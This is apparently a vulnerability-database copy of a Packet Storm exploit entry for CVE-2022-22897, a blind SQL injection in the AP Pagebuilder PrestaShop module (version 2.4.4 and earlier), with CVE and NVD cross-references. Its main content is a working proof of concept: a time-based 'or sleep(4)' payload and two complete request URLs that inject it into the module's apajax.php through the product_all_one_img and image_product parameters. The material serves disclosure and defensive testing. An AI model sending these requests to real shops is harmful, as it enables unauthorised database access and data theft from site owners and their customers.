Lucene search
Mohamed Ali HammamiPACKETSTORM:168148HistoryAug 25, 2022 - 12:00 a.m.
PrestaShop Ap Pagebuilder 2.4.4 SQL Injection
2022-08-2500:00:00
Mohamed Ali Hammami
packetstormsecurity.com
290
exploit
sql injection
prestashop
apollo theme
cve-2022-22897
windows 10
security advisory
0.085 Low
EPSS
Percentile
94.5%
`# Exploit Title: AP PAGEBUILDER Prestashop module <= 2.4.4 'product_all_one_img' , 'image_product' Blind SQL Injection
# Date: 24-08-2022
# Exploit Author: Mohamed Ali Hammami
# Vendor Homepage: https://apollotheme.com/
#Software Link : https://apollotheme.com/products/ap-pagebuilder-prestashop-module
# Version: 2.4.4
# Tested on: Windows 10
#CVE: CVE-2022-22897
Parameters: product_all_one_img,image_product
Payload: 1) or sleep(4) #
Exploit:
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1)+or+sleep(4)%23&image_product=0&wishlist_compare=1
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1&image_product=1)+or+sleep(4)%23&wishlist_compare=1
`
Related
prion
prion
Sql injection
2022-08-29 06:15:00
cve
cve
CVE-2022-22897
2022-08-29 06:15:08
nuclei
nuclei
PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection
2023-07-13 16:54:13
cvelist
cvelist
CVE-2022-22897
2022-08-29 00:00:00
nvd
nvd
CVE-2022-22897
2022-08-29 06:15:08
zdt
zdt
PrestaShop Ap Pagebuilder 2.4.4 SQL Injection Vulnerability
2022-08-25 00:00:00